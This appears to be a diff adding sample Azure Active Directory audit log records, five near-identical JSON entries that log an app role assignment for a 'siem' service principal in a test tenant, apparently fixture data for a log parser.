+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9992570Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795878"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "41c7d7a7-ce53-4696-aa78-37c451a95fe1"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9242333Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795815"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "14f7e7eb-0fd1-4f89-bda8-642d035f3541"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9992570Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795878"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "41c7d7a7-ce53-4696-aa78-37c451a95fe1"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9992570Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795878"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "41c7d7a7-ce53-4696-aa78-37c451a95fe1"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9242333Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795815"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "14f7e7eb-0fd1-4f89-bda8-642d035f3541"}
